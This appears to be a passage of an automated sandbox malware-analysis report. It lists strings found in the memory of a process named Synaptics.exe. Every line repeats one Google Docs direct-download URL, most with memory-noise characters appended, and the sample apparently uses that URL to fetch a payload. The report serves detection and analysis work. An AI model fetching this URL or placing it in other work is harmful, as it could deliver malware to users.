                              Source: Synaptics.exe, 0000000A.00000002.2890890608.000000001D736000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 0000000A.00000002.2805475098.00000000008EE000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 0000000A.00000002.2896383994.000000001D8DB000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 0000000A.00000002.2849014206.000000000F698000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 0000000A.00000002.2811128271.00000000056F7000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 0000000A.00000002.2850549729.000000000F730000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 0000000A.00000002.2851712170.000000000F7E0000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 0000000A.00000002.2805475098.00000000008B5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download_
                              Source: Synaptics.exe, 0000000A.00000002.2811128271.00000000056F7000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download_P
                              Source: Synaptics.exe, 0000000A.00000002.2843843804.000000000F482000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download_TFX/
                              Source: Synaptics.exe, 0000000A.00000002.2820637181.000000000710C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download_seX
                              Source: Synaptics.exe, 0000000A.00000002.2847387156.000000000F5FF000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 0000000A.00000002.2843843804.000000000F482000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 0000000A.00000002.2820637181.0000000007203000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 0000000A.00000002.2845813815.000000000F535000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 0000000A.00000002.2851712170.000000000F7E0000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 0000000A.00000002.2805475098.00000000008CA000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 0000000A.00000002.2811128271.00000000056C2000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloada
                              Source: Synaptics.exe, 0000000A.00000002.2811128271.00000000056F7000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloada-form-f
                              Source: Synaptics.exe, 0000000A.00000002.2820637181.0000000007203000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadaN
                              Source: Synaptics.exe, 0000000A.00000002.2887185524.000000001D648000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadam
                              Source: Synaptics.exe, 0000000A.00000002.2845813815.000000000F535000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadam?
                              Source: Synaptics.exe, 0000000A.00000002.2845813815.000000000F535000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadamR
                              Source: Synaptics.exe, 0000000A.00000002.2820637181.00000000070C8000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 0000000A.00000002.2850549729.000000000F730000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadamad
                              Source: Synaptics.exe, 0000000A.00000002.2887185524.000000001D648000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadame
                              Source: Synaptics.exe, 0000000A.00000002.2843843804.000000000F482000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadancis$8JZ0(
                              Source: Synaptics.exe, 0000000A.00000002.2843843804.000000000F482000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadany
                              Source: Synaptics.exe, 0000000A.00000002.2805475098.0000000000875000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadate
                              Source: Synaptics.exe, 0000000A.00000002.2811128271.00000000056F7000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadate:
                              Source: Synaptics.exe, 0000000A.00000002.2805475098.000000000084D000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 0000000A.00000002.2820637181.00000000070C8000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 0000000A.00000002.2850549729.000000000F730000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 0000000A.00000002.2820637181.00000000071A5000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 0000000A.00000002.2851712170.000000000F7E0000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 0000000A.00000002.2805475098.00000000008CA000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 0000000A.00000002.2811128271.00000000056C2000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadb
                              Source: Synaptics.exe, 0000000A.00000002.2849014206.000000000F698000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadb)pY:
                              Source: Synaptics.exe, 0000000A.00000002.2845813815.000000000F535000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadba
                              Source: Synaptics.exe, 0000000A.00000002.2845813815.000000000F535000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadbo
                              Source: Synaptics.exe, 0000000A.00000002.2890890608.000000001D736000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 0000000A.00000002.2805475098.00000000008EE000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 0000000A.00000002.2896383994.000000001D8DB000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 0000000A.00000002.2849014206.000000000F698000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 0000000A.00000002.2805475098.0000000000875000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 0000000A.00000002.2845813815.000000000F535000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 0000000A.00000002.2851712170.000000000F7E0000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 0000000A.00000002.2811128271.00000000056C2000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadc
                              Source: Synaptics.exe, 0000000A.00000002.2811128271.00000000056F7000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadc)5XY
                              Source: Synaptics.exe, 0000000A.00000002.2845813815.000000000F535000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadc-
                              Source: Synaptics.exe, 0000000A.00000002.2845813815.000000000F535000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadc.comn
                              Source: Synaptics.exe, 0000000A.00000002.2843843804.000000000F482000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 0000000A.00000002.2845813815.000000000F535000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadcW
                              Source: Synaptics.exe, 0000000A.00000002.2845813815.000000000F535000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadcaptc
                              Source: Synaptics.exe, 0000000A.00000002.2887185524.000000001D648000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 0000000A.00000002.2820637181.0000000007203000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 0000000A.00000002.2845813815.000000000F535000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadce
                              Source: Synaptics.exe, 0000000A.00000002.2887185524.000000001D648000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadcell%
                              Source: Synaptics.exe, 0000000A.00000002.2850549729.000000000F730000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadcell1
                              Source: Synaptics.exe, 0000000A.00000002.2887185524.000000001D648000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadcelle
                              Source: Synaptics.exe, 0000000A.00000002.2887185524.000000001D648000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadcellp
                              Source: Synaptics.exe, 0000000A.00000002.2845813815.000000000F535000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadces-c
                              Source: Synaptics.exe, 0000000A.00000002.2845813815.000000000F535000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadch
                              Source: Synaptics.exe, 0000000A.00000002.2811128271.00000000056F7000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 0000000A.00000003.2047511429.0000000005707000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadckgro
                              Source: Synaptics.exe, 0000000A.00000002.2811128271.00000000056F7000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadclosE
                              Source: Synaptics.exe, 0000000A.00000002.2845813815.000000000F535000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadcn.ne
                              Source: Synaptics.exe, 0000000A.00000002.2843843804.000000000F482000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadco1
                              Source: Synaptics.exe, 0000000A.00000002.2811128271.00000000056F7000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadcom
                              Source: Synaptics.exe, 0000000A.00000002.2820637181.00000000070C8000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 0000000A.00000002.2850549729.000000000F730000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadcom.
                              Source: Synaptics.exe, 0000000A.00000002.2887185524.000000001D648000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadcs.dl
                              Source: Synaptics.exe, 0000000A.00000002.2805475098.00000000008EE000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 0000000A.00000002.2896383994.000000001D8DB000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 0000000A.00000002.2849014206.000000000F698000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 0000000A.00000002.2811128271.00000000056F7000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 0000000A.00000002.2805475098.0000000000917000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 0000000A.00000002.2820637181.00000000070C8000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 0000000A.00000002.2850549729.000000000F730000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 0000000A.00000003.2047221664.00000000008EA000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 0000000A.00000002.2851712170.000000000F7E0000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 0000000A.00000002.2805475098.00000000008CA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadd
                              Source: Synaptics.exe, 0000000A.00000002.2805475098.00000000008EE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadd.go
                              Source: Synaptics.exe, 0000000A.00000002.2820637181.0000000007203000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadd1
                              Source: Synaptics.exe, 0000000A.00000002.2811128271.00000000056F7000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloaddP0Y
                              Source: Synaptics.exe, 0000000A.00000002.2811128271.00000000056F7000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 0000000A.00000003.2047511429.0000000005707000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloaddate
                              Source: Synaptics.exe, 0000000A.00000002.2805475098.0000000000886000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadder
                              Source: Synaptics.exe, 0000000A.00000002.2845813815.000000000F535000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloaddtO
                              Source: Synaptics.exe, 0000000A.00000002.2845813815.000000000F535000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 0000000A.00000002.2892404923.000000001D7B6000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 0000000A.00000002.2805475098.00000000008CA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloade
                              Source: Synaptics.exe, 0000000A.00000002.2820637181.0000000007203000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloade.
                              Source: Synaptics.exe, 0000000A.00000002.2843843804.000000000F482000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloade.com
                              Source: Synaptics.exe, 0000000A.00000002.2843843804.000000000F482000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloade9
                              Source: Synaptics.exe, 0000000A.00000002.2847387156.000000000F5FF000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadeA
                              Source: Synaptics.exe, 0000000A.00000002.2847387156.000000000F5FF000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadeD
                              Source: Synaptics.exe, 0000000A.00000002.2811128271.00000000056F7000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 0000000A.00000003.2047511429.0000000005707000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadeI9UH
                              Source: Synaptics.exe, 0000000A.00000002.2811128271.0000000005730000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadeY
                              Source: Synaptics.exe, 0000000A.00000002.2845813815.000000000F535000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadec
                              Source: Synaptics.exe, 0000000A.00000002.2887185524.000000001D648000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloaded
                              Source: Synaptics.exe, 0000000A.00000002.2850549729.000000000F730000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloaded.m
                              Source: Synaptics.exe, 0000000A.00000002.2887185524.000000001D648000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 0000000A.00000002.2845813815.000000000F535000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadel
                              Source: Synaptics.exe, 0000000A.00000002.2887185524.000000001D648000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 0000000A.00000002.2820637181.00000000070C8000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 0000000A.00000002.2850549729.000000000F730000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadellem
                              Source: Synaptics.exe, 0000000A.00000002.2850549729.000000000F730000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadellem/
                              Source: Synaptics.exe, 0000000A.00000002.2887185524.000000001D648000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadellem3
                              Source: Synaptics.exe, 0000000A.00000002.2887185524.000000001D648000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadelleme
                              Source: Synaptics.exe, 0000000A.00000002.2887185524.000000001D648000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 0000000A.00000002.2845813815.000000000F535000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 0000000A.00000002.2892404923.000000001D7B6000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadem
                              Source: Synaptics.exe, 0000000A.00000002.2850549729.000000000F730000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloademe
                              Source: Synaptics.exe, 0000000A.00000002.2845813815.000000000F535000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloademv
                              Source: Synaptics.exe, 0000000A.00000002.2887185524.000000001D648000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 0000000A.00000002.2845813815.000000000F535000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloaden
                              Source: Synaptics.exe, 0000000A.00000002.2887185524.000000001D648000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloaden8
                              Source: Synaptics.exe, 0000000A.00000002.2887185524.000000001D648000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 0000000A.00000002.2820637181.00000000070C8000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 0000000A.00000002.2850549729.000000000F730000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadenetl
                              Source: Synaptics.exe, 0000000A.00000002.2820637181.00000000070C8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadenetle
                              Source: Synaptics.exe, 0000000A.00000002.2887185524.000000001D648000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadenetlx
                              Source: Synaptics.exe, 0000000A.00000002.2887185524.000000001D648000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadenh
                              Source: Synaptics.exe, 0000000A.00000002.2887185524.000000001D648000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadeniyo
                              Source: Synaptics.exe, 0000000A.00000002.2820637181.0000000007203000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloader
                              Source: Synaptics.exe, 0000000A.00000002.2820637181.00000000070C8000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 0000000A.00000002.2850549729.000000000F730000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloaderve
                              Source: Synaptics.exe, 0000000A.00000002.2887185524.000000001D648000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadeskt
                              Source: Synaptics.exe, 0000000A.00000002.2845813815.000000000F535000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadet
                              Source: Synaptics.exe, 0000000A.00000002.2887185524.000000001D648000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadetX
                              Source: Synaptics.exe, 0000000A.00000002.2887185524.000000001D648000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadetl
                              Source: Synaptics.exe, 0000000A.00000002.2887185524.000000001D648000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadetle
                              Source: Synaptics.exe, 0000000A.00000002.2887185524.000000001D648000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 0000000A.00000002.2820637181.00000000070C8000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 0000000A.00000002.2850549729.000000000F730000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadetlen
                              Source: Synaptics.exe, 0000000A.00000002.2820637181.00000000070C8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadetlen5
                              Source: Synaptics.exe, 0000000A.00000002.2887185524.000000001D648000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 0000000A.00000002.2820637181.00000000071A5000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 0000000A.00000002.2851712170.000000000F7E0000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 0000000A.00000002.2892404923.000000001D7B6000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 0000000A.00000002.2805475098.00000000008CA000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 0000000A.00000002.2892404923.000000001D79E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadf
                              Source: Synaptics.exe, 0000000A.00000002.2811128271.00000000056F7000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadfS
                              Source: Synaptics.exe, 0000000A.00000002.2845813815.000000000F535000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadfefra
                              Source: Synaptics.exe, 0000000A.00000002.2887185524.000000001D648000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 0000000A.00000002.2850549729.000000000F730000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 0000000A.00000002.2845813815.000000000F535000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 0000000A.00000002.2851712170.000000000F7E0000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 0000000A.00000002.2892404923.000000001D79E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadg
                              Source: Synaptics.exe, 0000000A.00000002.2849014206.000000000F698000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadg(sXQ
                              Source: Synaptics.exe, 0000000A.00000002.2820637181.0000000007203000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadg.
                              Source: Synaptics.exe, 0000000A.00000002.2811128271.00000000056F7000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadgle-
                              Source: Synaptics.exe, 0000000A.00000002.2845813815.000000000F535000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadgoogl
                              Source: Synaptics.exe, 0000000A.00000002.2820637181.000000000710C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadgr
                              Source: Synaptics.exe, 0000000A.00000002.2850549729.000000000F730000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 0000000A.00000002.2843843804.000000000F482000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 0000000A.00000002.2914486656.0000000023A3E000.00000004.00000010.00020000.00000000.sdmp, Synaptics.exe, 0000000A.00000002.2892404923.000000001D7B6000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadh
                              Source: Synaptics.exe, 0000000A.00000002.2845813815.000000000F535000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadh3
                              Source: Synaptics.exe, 0000000A.00000002.2845813815.000000000F535000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadh:
                              Source: Synaptics.exe, 0000000A.00000002.2820637181.00000000070C8000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 0000000A.00000002.2850549729.000000000F730000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadhostn
                              Source: Synaptics.exe, 0000000A.00000002.2850549729.000000000F730000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 0000000A.00000002.2851712170.000000000F7E0000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 0000000A.00000002.2805475098.00000000008CA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadi
